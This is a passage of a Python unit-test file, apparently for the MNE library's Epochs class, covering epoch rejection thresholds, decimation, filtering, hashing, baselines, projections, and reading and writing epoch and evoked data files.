assert_allclose(evoked_miss.info['dev_head_t']['trans'],
destination['trans'])
# degenerate cases
destination['to'] = destination['from'] # bad dest
assert_raises(RuntimeError, average_movements, epochs, head_pos,
origin=origin, destination=destination)
assert_raises(TypeError, average_movements, 'foo', head_pos=head_pos)
assert_raises(RuntimeError, average_movements, epochs_proj,
head_pos=head_pos) # prj
def test_reject():
"""Test epochs rejection."""
raw, events, picks = _get_data()
# cull the list just to contain the relevant event
events = events[events[:, 2] == event_id, :]
selection = np.arange(3)
drop_log = [[]] * 3 + [['MEG 2443']] * 4
assert_raises(TypeError, pick_types, raw)
picks_meg = pick_types(raw.info, meg=True, eeg=False)
assert_raises(TypeError, Epochs, raw, events, event_id, tmin, tmax,
picks=picks, preload=False, reject='foo')
assert_raises(ValueError, Epochs, raw, events, event_id, tmin, tmax,
picks=picks_meg, preload=False, reject=dict(eeg=1.))
# this one is okay because it's not actually requesting rejection
Epochs(raw, events, event_id, tmin, tmax, picks=picks_meg,
preload=False, reject=dict(eeg=np.inf))
for val in (None, -1): # protect against older MNE-C types
for kwarg in ('reject', 'flat'):
assert_raises(ValueError, Epochs, raw, events, event_id,
tmin, tmax, picks=picks_meg, preload=False,
**{kwarg: dict(grad=val)})
assert_raises(KeyError, Epochs, raw, events, event_id, tmin, tmax,
picks=picks, preload=False, reject=dict(foo=1.))
data_7 = dict()
keep_idx = [0, 1, 2]
for preload in (True, False):
for proj in (True, False, 'delayed'):
# no rejection
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
preload=preload)
assert_raises(ValueError, epochs.drop_bad, reject='foo')
epochs.drop_bad()
assert_equal(len(epochs), len(events))
assert_array_equal(epochs.selection, np.arange(len(events)))
assert_array_equal(epochs.drop_log, [[]] * 7)
if proj not in data_7:
data_7[proj] = epochs.get_data()
assert_array_equal(epochs.get_data(), data_7[proj])
# with rejection
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
reject=reject, preload=preload)
epochs.drop_bad()
assert_equal(len(epochs), len(events) - 4)
assert_array_equal(epochs.selection, selection)
assert_array_equal(epochs.drop_log, drop_log)
assert_array_equal(epochs.get_data(), data_7[proj][keep_idx])
# rejection post-hoc
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
preload=preload)
epochs.drop_bad()
assert_equal(len(epochs), len(events))
assert_array_equal(epochs.get_data(), data_7[proj])
epochs.drop_bad(reject)
assert_equal(len(epochs), len(events) - 4)
assert_equal(len(epochs), len(epochs.get_data()))
assert_array_equal(epochs.selection, selection)
assert_array_equal(epochs.drop_log, drop_log)
assert_array_equal(epochs.get_data(), data_7[proj][keep_idx])
# rejection twice
reject_part = dict(grad=1100e-12, mag=4e-12, eeg=80e-6, eog=150e-6)
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
reject=reject_part, preload=preload)
epochs.drop_bad()
assert_equal(len(epochs), len(events) - 1)
epochs.drop_bad(reject)
assert_equal(len(epochs), len(events) - 4)
assert_array_equal(epochs.selection, selection)
assert_array_equal(epochs.drop_log, drop_log)
assert_array_equal(epochs.get_data(), data_7[proj][keep_idx])
# ensure that thresholds must become more stringent, not less
assert_raises(ValueError, epochs.drop_bad, reject_part)
assert_equal(len(epochs), len(events) - 4)
assert_array_equal(epochs.get_data(), data_7[proj][keep_idx])
epochs.drop_bad(flat=dict(mag=1.))
assert_equal(len(epochs), 0)
assert_raises(ValueError, epochs.drop_bad,
flat=dict(mag=0.))
# rejection of subset of trials (ensure array ownership)
reject_part = dict(grad=1100e-12, mag=4e-12, eeg=80e-6, eog=150e-6)
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
reject=None, preload=preload)
epochs = epochs[:-1]
epochs.drop_bad(reject=reject)
assert_equal(len(epochs), len(events) - 4)
assert_array_equal(epochs.get_data(), data_7[proj][keep_idx])
# rejection on annotations
sfreq = raw.info['sfreq']
onsets = [(event[0] - raw.first_samp) / sfreq for event in
events[::2][:3]]
onsets[0] = onsets[0] + tmin - 0.499 # tmin < 0
onsets[1] = onsets[1] + tmax - 0.001
first_time = (raw.info['meas_date'][0] + raw.info['meas_date'][1] *
0.000001 + raw.first_samp / sfreq)
for orig_time in [None, first_time]:
raw.annotations = Annotations(onsets, [0.5, 0.5, 0.5], 'BAD',
orig_time)
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=[0],
reject=None, preload=preload)
epochs.drop_bad()
assert_equal(len(events) - 3, len(epochs.events))
assert_equal(epochs.drop_log[0][0], 'BAD')
assert_equal(epochs.drop_log[2][0], 'BAD')
assert_equal(epochs.drop_log[4][0], 'BAD')
raw.annotations = None
def test_decim():
"""Test epochs decimation."""
# First with EpochsArray
dec_1, dec_2 = 2, 3
decim = dec_1 * dec_2
n_epochs, n_channels, n_times = 5, 10, 20
sfreq = 1000.
sfreq_new = sfreq / decim
data = rng.randn(n_epochs, n_channels, n_times)
events = np.array([np.arange(n_epochs), [0] * n_epochs, [1] * n_epochs]).T
info = create_info(n_channels, sfreq, 'eeg')
info['lowpass'] = sfreq_new / float(decim)
epochs = EpochsArray(data, info, events)
data_epochs = epochs.copy().decimate(decim).get_data()
data_epochs_2 = epochs.copy().decimate(decim, offset=1).get_data()
data_epochs_3 = epochs.decimate(dec_1).decimate(dec_2).get_data()
assert_array_equal(data_epochs, data[:, :, ::decim])
assert_array_equal(data_epochs_2, data[:, :, 1::decim])
assert_array_equal(data_epochs, data_epochs_3)
# Now let's do it with some real data
raw, events, picks = _get_data()
events = events[events[:, 2] == 1][:2]
raw.load_data().pick_channels([raw.ch_names[pick] for pick in picks[::30]])
raw.info.normalize_proj()
del picks
sfreq_new = raw.info['sfreq'] / decim
raw.info['lowpass'] = sfreq_new / 12. # suppress aliasing warnings
assert_raises(ValueError, epochs.decimate, -1)
assert_raises(ValueError, epochs.decimate, 2, offset=-1)
assert_raises(ValueError, epochs.decimate, 2, offset=2)
for this_offset in range(decim):
epochs = Epochs(raw, events, event_id,
tmin=-this_offset / raw.info['sfreq'], tmax=tmax)
idx_offsets = np.arange(decim) + this_offset
for offset, idx_offset in zip(np.arange(decim), idx_offsets):
expected_times = epochs.times[idx_offset::decim]
expected_data = epochs.get_data()[:, :, idx_offset::decim]
must_have = offset / float(epochs.info['sfreq'])
assert_true(np.isclose(must_have, expected_times).any())
ep_decim = epochs.copy().decimate(decim, offset)
assert_true(np.isclose(must_have, ep_decim.times).any())
assert_allclose(ep_decim.times, expected_times)
assert_allclose(ep_decim.get_data(), expected_data)
assert_equal(ep_decim.info['sfreq'], sfreq_new)
# More complex cases
epochs = Epochs(raw, events, event_id, tmin, tmax)
expected_data = epochs.get_data()[:, :, ::decim]
expected_times = epochs.times[::decim]
for preload in (True, False):
# at init
epochs = Epochs(raw, events, event_id, tmin, tmax, decim=decim,
preload=preload)
assert_allclose(epochs.get_data(), expected_data)
assert_allclose(epochs.get_data(), expected_data)
assert_equal(epochs.info['sfreq'], sfreq_new)
assert_array_equal(epochs.times, expected_times)
# split between init and afterward
epochs = Epochs(raw, events, event_id, tmin, tmax, decim=dec_1,
preload=preload).decimate(dec_2)
assert_allclose(epochs.get_data(), expected_data)
assert_allclose(epochs.get_data(), expected_data)
assert_equal(epochs.info['sfreq'], sfreq_new)
assert_array_equal(epochs.times, expected_times)
epochs = Epochs(raw, events, event_id, tmin, tmax, decim=dec_2,
preload=preload).decimate(dec_1)
assert_allclose(epochs.get_data(), expected_data)
assert_allclose(epochs.get_data(), expected_data)
assert_equal(epochs.info['sfreq'], sfreq_new)
assert_array_equal(epochs.times, expected_times)
# split between init and afterward, with preload in between
epochs = Epochs(raw, events, event_id, tmin, tmax, decim=dec_1,
preload=preload)
epochs.load_data()
epochs = epochs.decimate(dec_2)
assert_allclose(epochs.get_data(), expected_data)
assert_allclose(epochs.get_data(), expected_data)
assert_equal(epochs.info['sfreq'], sfreq_new)
assert_array_equal(epochs.times, expected_times)
epochs = Epochs(raw, events, event_id, tmin, tmax, decim=dec_2,
preload=preload)
epochs.load_data()
epochs = epochs.decimate(dec_1)
assert_allclose(epochs.get_data(), expected_data)
assert_allclose(epochs.get_data(), expected_data)
assert_equal(epochs.info['sfreq'], sfreq_new)
assert_array_equal(epochs.times, expected_times)
# decimate afterward
epochs = Epochs(raw, events, event_id, tmin, tmax,
preload=preload).decimate(decim)
assert_allclose(epochs.get_data(), expected_data)
assert_allclose(epochs.get_data(), expected_data)
assert_equal(epochs.info['sfreq'], sfreq_new)
assert_array_equal(epochs.times, expected_times)
# decimate afterward, with preload in between
epochs = Epochs(raw, events, event_id, tmin, tmax, preload=preload)
epochs.load_data()
epochs.decimate(decim)
assert_allclose(epochs.get_data(), expected_data)
assert_allclose(epochs.get_data(), expected_data)
assert_equal(epochs.info['sfreq'], sfreq_new)
assert_array_equal(epochs.times, expected_times)
def test_base_epochs():
"""Test base epochs class."""
raw = _get_data()[0]
epochs = BaseEpochs(raw.info, None, np.ones((1, 3), int),
event_id, tmin, tmax)
assert_raises(NotImplementedError, epochs.get_data)
# events with non integers
assert_raises(ValueError, BaseEpochs, raw.info, None,
np.ones((1, 3), float), event_id, tmin, tmax)
assert_raises(ValueError, BaseEpochs, raw.info, None,
np.ones((1, 3, 2), int), event_id, tmin, tmax)
@requires_version('scipy', '0.14')
def test_savgol_filter():
"""Test savgol filtering."""
h_freq = 10.
raw, events = _get_data()[:2]
epochs = Epochs(raw, events, event_id, tmin, tmax)
assert_raises(RuntimeError, epochs.savgol_filter, 10.)
epochs = Epochs(raw, events, event_id, tmin, tmax, preload=True)
freqs = fftpack.fftfreq(len(epochs.times), 1. / epochs.info['sfreq'])
data = np.abs(fftpack.fft(epochs.get_data()))
match_mask = np.logical_and(freqs >= 0, freqs <= h_freq / 2.)
mismatch_mask = np.logical_and(freqs >= h_freq * 2, freqs < 50.)
epochs.savgol_filter(h_freq)
data_filt = np.abs(fftpack.fft(epochs.get_data()))
# decent in pass-band
assert_allclose(np.mean(data[:, :, match_mask], 0),
np.mean(data_filt[:, :, match_mask], 0),
rtol=1e-4, atol=1e-2)
# suppression in stop-band
assert_true(np.mean(data[:, :, mismatch_mask]) >
np.mean(data_filt[:, :, mismatch_mask]) * 5)
def test_epochs_hash():
"""Test epoch hashing."""
raw, events = _get_data()[:2]
epochs = Epochs(raw, events, event_id, tmin, tmax)
assert_raises(RuntimeError, epochs.__hash__)
epochs = Epochs(raw, events, event_id, tmin, tmax, preload=True)
assert_equal(hash(epochs), hash(epochs))
epochs_2 = Epochs(raw, events, event_id, tmin, tmax, preload=True)
assert_equal(hash(epochs), hash(epochs_2))
# do NOT use assert_equal here, failing output is terrible
assert_true(pickle.dumps(epochs) == pickle.dumps(epochs_2))
epochs_2._data[0, 0, 0] -= 1
assert_not_equal(hash(epochs), hash(epochs_2))
def test_event_ordering():
"""Test event order."""
raw, events = _get_data()[:2]
events2 = events.copy()
rng.shuffle(events2)
for ii, eve in enumerate([events, events2]):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
Epochs(raw, eve, event_id, tmin, tmax,
reject=reject, flat=flat)
assert_equal(len(w), ii)
if ii > 0:
assert_true('chronologically' in '%s' % w[-1].message)
# Duplicate events should be an error...
events2 = events[[0, 0]]
events2[:, 2] = [1, 2]
assert_raises(RuntimeError, Epochs, raw, events2, event_id=None)
# But only if duplicates are actually used by event_id
assert_equal(len(Epochs(raw, events2, event_id=dict(a=1), preload=True)),
1)
def test_epochs_bad_baseline():
"""Test Epochs initialization with bad baseline parameters."""
raw, events = _get_data()[:2]
assert_raises(ValueError, Epochs, raw, events, None, -0.1, 0.3, (-0.2, 0))
assert_raises(ValueError, Epochs, raw, events, None, -0.1, 0.3, (0, 0.4))
assert_raises(ValueError, Epochs, raw, events, None, -0.1, 0.3, (0.1, 0))
assert_raises(ValueError, Epochs, raw, events, None, 0.1, 0.3, (None, 0))
assert_raises(ValueError, Epochs, raw, events, None, -0.3, -0.1, (0, None))
epochs = Epochs(raw, events, None, 0.1, 0.3, baseline=None)
assert_raises(RuntimeError, epochs.apply_baseline, (0.1, 0.2))
epochs.load_data()
assert_raises(ValueError, epochs.apply_baseline, (None, 0))
assert_raises(ValueError, epochs.apply_baseline, (0, None))
# put some rescale options here, too
data = np.arange(100, dtype=float)
assert_raises(ValueError, rescale, data, times=data, baseline=(-2, -1))
rescale(data.copy(), times=data, baseline=(2, 2)) # ok
assert_raises(ValueError, rescale, data, times=data, baseline=(2, 1))
assert_raises(ValueError, rescale, data, times=data, baseline=(100, 101))
def test_epoch_combine_ids():
"""Test combining event ids in epochs compared to events."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events, {'a': 1, 'b': 2, 'c': 3,
'd': 4, 'e': 5, 'f': 32},
tmin, tmax, picks=picks, preload=False)
events_new = merge_events(events, [1, 2], 12)
epochs_new = combine_event_ids(epochs, ['a', 'b'], {'ab': 12})
assert_equal(epochs_new['ab']._name, 'ab')
assert_array_equal(events_new, epochs_new.events)
# should probably add test + functionality for non-replacement XXX
def test_epoch_multi_ids():
"""Test epoch selection via multiple/partial keys."""
raw, events, picks = _get_data()
epochs = Epochs(raw, events, {'a/b/a': 1, 'a/b/b': 2, 'a/c': 3,
'b/d': 4, 'a_b': 5},
tmin, tmax, picks=picks, preload=False)
epochs_regular = epochs['a/b']
epochs_reverse = epochs['b/a']
epochs_multi = epochs[['a/b/a', 'a/b/b']]
assert_array_equal(epochs_multi.events, epochs_regular.events)
assert_array_equal(epochs_reverse.events, epochs_regular.events)
assert_allclose(epochs_multi.get_data(), epochs_regular.get_data())
assert_allclose(epochs_reverse.get_data(), epochs_regular.get_data())
def test_read_epochs_bad_events():
"""Test epochs when events are at the beginning or the end of the file."""
raw, events, picks = _get_data()
# Event at the beginning
epochs = Epochs(raw, np.array([[raw.first_samp, 0, event_id]]),
event_id, tmin, tmax, picks=picks)
with warnings.catch_warnings(record=True):
evoked = epochs.average()
epochs = Epochs(raw, np.array([[raw.first_samp, 0, event_id]]),
event_id, tmin, tmax, picks=picks)
assert_true(repr(epochs)) # test repr
epochs.drop_bad()
assert_true(repr(epochs))
with warnings.catch_warnings(record=True):
evoked = epochs.average()
# Event at the end
epochs = Epochs(raw, np.array([[raw.last_samp, 0, event_id]]),
event_id, tmin, tmax, picks=picks)
with warnings.catch_warnings(record=True):
evoked = epochs.average()
assert evoked
warnings.resetwarnings()
@slow_test
def test_read_write_epochs():
"""Test epochs from raw files with IO as fif file."""
raw, events, picks = _get_data(preload=True)
tempdir = _TempDir()
temp_fname = op.join(tempdir, 'test-epo.fif')
temp_fname_no_bl = op.join(tempdir, 'test_no_bl-epo.fif')
baseline = (None, 0)
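    # (None, 0) baseline-corrects each epoch over the interval from the start
    # of the epoch up to time zero (the event onset).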
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
baseline=baseline, preload=True)
epochs_orig = epochs.copy()
epochs_no_bl = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
baseline=None, preload=True)
assert_true(epochs_no_bl.baseline is None)
evoked = epochs.average()
data = epochs.get_data()
# Bad tmin/tmax parameters
assert_raises(ValueError, Epochs, raw, events, event_id, tmax, tmin,
baseline=None)
epochs_no_id = Epochs(raw, pick_events(events, include=event_id),
None, tmin, tmax, picks=picks)
assert_array_equal(data, epochs_no_id.get_data())
eog_picks = pick_types(raw.info, meg=False, eeg=False, stim=False,
eog=True, exclude='bads')
eog_ch_names = [raw.ch_names[k] for k in eog_picks]
epochs.drop_channels(eog_ch_names)
assert_true(len(epochs.info['chs']) == len(epochs.ch_names) ==
epochs.get_data().shape[1])
data_no_eog = epochs.get_data()
assert_true(data.shape[1] == (data_no_eog.shape[1] + len(eog_picks)))
# test decim kwarg
with warnings.catch_warnings(record=True) as w:
# decim with lowpass
warnings.simplefilter('always')
epochs_dec = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
decim=2)
assert_equal(len(w), 1)
# decim without lowpass
epochs_dec.info['lowpass'] = None
epochs_dec.decimate(2)
assert_equal(len(w), 2)
data_dec = epochs_dec.get_data()
assert_allclose(data[:, :, epochs_dec._decim_slice], data_dec, rtol=1e-7,
atol=1e-12)
evoked_dec = epochs_dec.average()
assert_allclose(evoked.data[:, epochs_dec._decim_slice],
evoked_dec.data, rtol=1e-12, atol=1e-17)
n = evoked.data.shape[1]
n_dec = evoked_dec.data.shape[1]
n_dec_min = n // 4
assert_true(n_dec_min <= n_dec <= n_dec_min + 1)
assert_true(evoked_dec.info['sfreq'] == evoked.info['sfreq'] / 4)
# Test event access on non-preloaded data (#2345)
# due to reapplication of the proj matrix, this is our quality limit
# for some tests
tols = dict(atol=1e-3, rtol=1e-20)
raw, events, picks = _get_data()
events[::2, 1] = 1
events[1::2, 2] = 2
event_ids = dict(a=1, b=2)
for proj in (True, 'delayed', False):
epochs = Epochs(raw, events, event_ids, tmin, tmax, picks=picks,
proj=proj, reject=reject)
assert_equal(epochs.proj, proj if proj != 'delayed' else False)
data1 = epochs.get_data()
epochs2 = epochs.copy().apply_proj()
assert_equal(epochs2.proj, True)
data2 = epochs2.get_data()
assert_allclose(data1, data2, **tols)
epochs.save(temp_fname)
epochs_read = read_epochs(temp_fname, preload=False)
assert_allclose(epochs.get_data(), epochs_read.get_data(), **tols)
assert_allclose(epochs['a'].get_data(),
epochs_read['a'].get_data(), **tols)
assert_allclose(epochs['b'].get_data(),
epochs_read['b'].get_data(), **tols)
# ensure we don't leak file descriptors
epochs_read = read_epochs(temp_fname, preload=False)
epochs_copy = epochs_read.copy()
del epochs_read
epochs_copy.get_data()
with warnings.catch_warnings(record=True) as w:
del epochs_copy
assert_equal(len(w), 0)
# test IO
for preload in (False, True):
epochs = epochs_orig.copy()
epochs.save(temp_fname)
epochs_no_bl.save(temp_fname_no_bl)
epochs_read = read_epochs(temp_fname, preload=preload)
epochs_no_bl.save(temp_fname_no_bl)
epochs_read = read_epochs(temp_fname)
epochs_no_bl_read = read_epochs(temp_fname_no_bl)
assert_raises(ValueError, epochs.apply_baseline, baseline=[1, 2, 3])
epochs_with_bl = epochs_no_bl_read.copy().apply_baseline(baseline)
assert_true(isinstance(epochs_with_bl, BaseEpochs))
assert_true(epochs_with_bl.baseline == baseline)
assert_true(epochs_no_bl_read.baseline != baseline)
assert_true(str(epochs_read).startswith('<Epochs'))
epochs_no_bl_read.apply_baseline(baseline)
assert_array_equal(epochs_no_bl_read.times, epochs.times)
assert_array_almost_equal(epochs_read.get_data(), epochs.get_data())
assert_array_almost_equal(epochs.get_data(),
epochs_no_bl_read.get_data())
assert_array_equal(epochs_read.times, epochs.times)
assert_array_almost_equal(epochs_read.average().data, evoked.data)
assert_equal(epochs_read.proj, epochs.proj)
bmin, bmax = epochs.baseline
if bmin is None:
bmin = epochs.times[0]
if bmax is None:
bmax = epochs.times[-1]
baseline = (bmin, bmax)
assert_array_almost_equal(epochs_read.baseline, baseline)
assert_array_almost_equal(epochs_read.tmin, epochs.tmin, 2)
assert_array_almost_equal(epochs_read.tmax, epochs.tmax, 2)
assert_equal(epochs_read.event_id, epochs.event_id)
epochs.event_id.pop('1')
epochs.event_id.update({'a:a': 1}) # test allow for ':' in key
epochs.save(op.join(tempdir, 'foo-epo.fif'))
epochs_read2 = read_epochs(op.join(tempdir, 'foo-epo.fif'),
preload=preload)
assert_equal(epochs_read2.event_id, epochs.event_id)
assert_equal(epochs_read2['a:a'].average().comment, 'a:a')
# add reject here so some of the epochs get dropped
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
reject=reject)
epochs.save(temp_fname)
# ensure bad events are not saved
epochs_read3 = read_epochs(temp_fname, preload=preload)
assert_array_equal(epochs_read3.events, epochs.events)
data = epochs.get_data()
assert_true(epochs_read3.events.shape[0] == data.shape[0])
# test copying loaded one (raw property)
epochs_read4 = epochs_read3.copy()
assert_array_almost_equal(epochs_read4.get_data(), data)
# test equalizing loaded one (drop_log property)
epochs_read4.equalize_event_counts(epochs.event_id)
epochs.drop([1, 2], reason='can we recover orig ID?')
epochs.save(temp_fname)
epochs_read5 = read_epochs(temp_fname, preload=preload)
assert_array_equal(epochs_read5.selection, epochs.selection)
assert_equal(len(epochs_read5.selection), len(epochs_read5.events))
assert_array_equal(epochs_read5.drop_log, epochs.drop_log)
if preload:
# Test that one can drop channels on read file
epochs_read5.drop_channels(epochs_read5.ch_names[:1])
# test warnings on bad filenames
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
epochs_badname = op.join(tempdir, 'test-bad-name.fif.gz')
epochs.save(epochs_badname)
read_epochs(epochs_badname, preload=preload)
assert_naming(w, 'test_epochs.py', 2)
# test loading epochs with missing events
epochs = Epochs(raw, events, dict(foo=1, bar=999), tmin, tmax,
picks=picks, on_missing='ignore')
epochs.save(temp_fname)
epochs_read = read_epochs(temp_fname, preload=preload)
assert_allclose(epochs.get_data(), epochs_read.get_data(), **tols)
assert_array_equal(epochs.events, epochs_read.events)
assert_equal(set(epochs.event_id.keys()),
set(text_type(x) for x in epochs_read.event_id.keys()))
# test saving split epoch files
epochs.save(temp_fname, split_size='7MB')
epochs_read = read_epochs(temp_fname, preload=preload)
assert_allclose(epochs.get_data(), epochs_read.get_data(), **tols)
assert_array_equal(epochs.events, epochs_read.events)
assert_array_equal(epochs.selection, epochs_read.selection)
assert_equal(epochs.drop_log, epochs_read.drop_log)
# Test that having a single time point works
epochs.load_data().crop(0, 0)
assert_equal(len(epochs.times), 1)
assert_equal(epochs.get_data().shape[-1], 1)
epochs.save(temp_fname)
epochs_read = read_epochs(temp_fname, preload=preload)
assert_equal(len(epochs_read.times), 1)
assert_equal(epochs.get_data().shape[-1], 1)
def test_epochs_proj():
"""Test handling projection (apply proj in Raw or in Epochs)."""
tempdir = _TempDir()
raw, events, picks = _get_data()
exclude = raw.info['bads'] + ['MEG 2443', 'EEG 053'] # bads + 2 more
this_picks = pick_types(raw.info, meg=True, eeg=False, stim=True,
eog=True, exclude=exclude)
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=this_picks,
proj=True)
assert_true(all(p['active'] is True for p in epochs.info['projs']))
evoked = epochs.average()
assert_true(all(p['active'] is True for p in evoked.info['projs']))
data = epochs.get_data()
raw_proj = read_raw_fif(raw_fname).apply_proj()
epochs_no_proj = Epochs(raw_proj, events[:4], event_id, tmin, tmax,
picks=this_picks, proj=False)
data_no_proj = epochs_no_proj.get_data()
assert_true(all(p['active'] is True for p in epochs_no_proj.info['projs']))
evoked_no_proj = epochs_no_proj.average()
assert_true(all(p['active'] is True for p in evoked_no_proj.info['projs']))
assert_true(epochs_no_proj.proj is True) # as projs are active from Raw
assert_array_almost_equal(data, data_no_proj, decimal=8)
# make sure we can exclude avg ref
this_picks = pick_types(raw.info, meg=True, eeg=True, stim=True,
eog=True, exclude=exclude)
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=this_picks,
proj=True)
epochs.set_eeg_reference().apply_proj()
assert_true(_has_eeg_average_ref_proj(epochs.info['projs']))
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=this_picks,
proj=True)
assert_true(not _has_eeg_average_ref_proj(epochs.info['projs']))
# make sure we don't add avg ref when a custom ref has been applied
raw.info['custom_ref_applied'] = True
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=this_picks,
proj=True)
assert_true(not _has_eeg_average_ref_proj(epochs.info['projs']))
# From GH#2200:
# This has no problem
proj = raw.info['projs']
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=this_picks,
proj=False)
epochs.info['projs'] = []
data = epochs.copy().add_proj(proj).apply_proj().get_data()
# save and reload data
fname_epo = op.join(tempdir, 'temp-epo.fif')
epochs.save(fname_epo) # Save without proj added
epochs_read = read_epochs(fname_epo)
epochs_read.add_proj(proj)
epochs_read.apply_proj() # This used to bomb
data_2 = epochs_read.get_data() # Let's check the result
assert_allclose(data, data_2, atol=1e-15, rtol=1e-3)
# adding EEG ref (GH #2727)
raw = read_raw_fif(raw_fname)
raw.add_proj([], remove_existing=True)
raw.info['bads'] = ['MEG 2443', 'EEG 053']
picks = pick_types(raw.info, meg=False, eeg=True, stim=True, eog=False,
exclude='bads')
epochs = Epochs(raw, events, event_id, tmin, tmax, proj=True, picks=picks,
preload=True)
epochs.pick_channels(['EEG 001', 'EEG 002'])
assert_equal(len(epochs), 7) # sufficient for testing
temp_fname = op.join(tempdir, 'test-epo.fif')
epochs.save(temp_fname)
for preload in (True, False):
epochs = read_epochs(temp_fname, proj=False, preload=preload)
epochs.set_eeg_reference().apply_proj()
assert_allclose(epochs.get_data().mean(axis=1), 0, atol=1e-15)
epochs = read_epochs(temp_fname, proj=False, preload=preload)
epochs.set_eeg_reference()
assert_raises(AssertionError, assert_allclose,
epochs.get_data().mean(axis=1), 0., atol=1e-15)
epochs.apply_proj()
assert_allclose(epochs.get_data().mean(axis=1), 0, atol=1e-15)
def test_evoked_arithmetic():
"""Test arithmetic of evoked data."""
raw, events, picks = _get_data()
epochs1 = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks)
evoked1 = epochs1.average()
epochs2 = Epochs(raw, events[4:8], event_id, tmin, tmax, picks=picks)
evoked2 = epochs2.average()
epochs = Epochs(raw, events[:8], event_id, tmin, tmax, picks=picks)
evoked = epochs.average()
evoked_sum = combine_evoked([evoked1, evoked2], weights='nave')
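    # weights='nave' combines the two sub-averages proportionally to their
    # nave, so the result should equal the grand average over all 8 epochs.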
assert_array_equal(evoked.data, evoked_sum.data)
assert_array_equal(evoked.times, evoked_sum.times)
assert_equal(evoked_sum.nave, evoked1.nave + evoked2.nave)
evoked_diff = combine_evoked([evoked1, evoked1], weights=[1, -1])
assert_array_equal(np.zeros_like(evoked.data), evoked_diff.data)
def test_evoked_io_from_epochs():
"""Test IO of evoked data made from epochs."""
tempdir = _TempDir()
raw, events, picks = _get_data()
# offset our tmin so we don't get exactly a zero value when decimating
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
epochs = Epochs(raw, events[:4], event_id, tmin + 0.011, tmax,
picks=picks, decim=5)
assert_true(len(w) == 1)
evoked = epochs.average()
evoked.info['proj_name'] = '' # Test that empty string shortcuts to None.
evoked.save(op.join(tempdir, 'evoked-ave.fif'))
evoked2 = read_evokeds(op.join(tempdir, 'evoked-ave.fif'))[0]
assert_equal(evoked2.info['proj_name'], None)
assert_allclose(evoked.data, evoked2.data, rtol=1e-4, atol=1e-20)
assert_allclose(evoked.times, evoked2.times, rtol=1e-4,
atol=1 / evoked.info['sfreq'])
# now let's do one with negative time
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
epochs = Epochs(raw, events[:4], event_id, 0.1, tmax,
picks=picks, baseline=(0.1, 0.2), decim=5)
evoked = epochs.average()
evoked.save(op.join(tempdir, 'evoked-ave.fif'))
evoked2 = read_evokeds(op.join(tempdir, 'evoked-ave.fif'))[0]
assert_allclose(evoked.data, evoked2.data, rtol=1e-4, atol=1e-20)
assert_allclose(evoked.times, evoked2.times, rtol=1e-4, atol=1e-20)
# should be equivalent to a cropped original
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
epochs = Epochs(raw, events[:4], event_id, -0.2, tmax,
picks=picks, baseline=(0.1, 0.2), decim=5)
evoked = epochs.average()
evoked.crop(0.099, None)
assert_allclose(evoked.data, evoked2.data, rtol=1e-4, atol=1e-20)
assert_allclose(evoked.times, evoked2.times, rtol=1e-4, atol=1e-20)
def test_evoked_standard_error():
"""Test calculation and read/write of standard error."""
raw, events, picks = _get_data()
tempdir = _TempDir()
epochs = Epochs(raw, events[:4], event_id, tmin, tmax, picks=picks)
evoked = [epochs.average(), epochs.standard_error()]
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), evoked)
evoked2 = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), [0, 1])
evoked3 = [read_evokeds(op.join(tempdir, 'evoked-ave.fif'), '1'),
read_evokeds(op.join(tempdir, 'evoked-ave.fif'), '1',
kind='standard_error')]
for evoked_new in [evoked2, evoked3]:
assert_true(evoked_new[0]._aspect_kind ==
FIFF.FIFFV_ASPECT_AVERAGE)
assert_true(evoked_new[0].kind == 'average')
assert_true(evoked_new[1]._aspect_kind ==
FIFF.FIFFV_ASPECT_STD_ERR)
assert_true(evoked_new[1].kind == 'standard_error')
for ave, ave2 in zip(evoked, evoked_new):
assert_array_almost_equal(ave.data, ave2.data)
assert_array_almost_equal(ave.times, ave2.times)
assert_equal(ave.nave, ave2.nave)
assert_equal(ave._aspect_kind, ave2._aspect_kind)
assert_equal(ave.kind, ave2.kind)
assert_equal(ave.last, ave2.last)
assert_equal(ave.first, ave2.first)
def test_reject_epochs():
"""Test of epochs rejection."""
raw, events, picks = _get_data()
events1 = events[events[:, 2] == event_id]
epochs = Epochs(raw, events1, event_id, tmin, tmax,
reject=reject, flat=flat)
assert_raises(RuntimeError, len, epochs)
n_events = len(epochs.events)
data = epochs.get_data()
n_clean_epochs = len(data)
# Should match
# mne_process_raw --raw test_raw.fif --projoff \
# --saveavetag -ave --ave test.ave --filteroff
assert_true(n_events > n_clean_epochs)
assert_true(n_clean_epochs == 3)
assert_true(epochs.drop_log == [[], [], [], ['MEG 2443'], ['MEG 2443'],
['MEG 2443'], ['MEG 2443']])
# Ensure epochs are not dropped based on a bad channel
raw_2 = raw.copy()
raw_2.info['bads'] = ['MEG 2443']
reject_crazy = dict(grad=1000e-15, mag=4e-15, eeg=80e-9, eog=150e-9)
epochs = Epochs(raw_2, events1, event_id, tmin, tmax,
reject=reject_crazy, flat=flat)
epochs.drop_bad()
assert_true(all('MEG 2442' in e for e in epochs.drop_log))
assert_true(all('MEG 2443' not in e for e in epochs.drop_log))
# Invalid reject_tmin/reject_tmax/detrend
assert_raises(ValueError, Epochs, raw, events1, event_id, tmin, tmax,
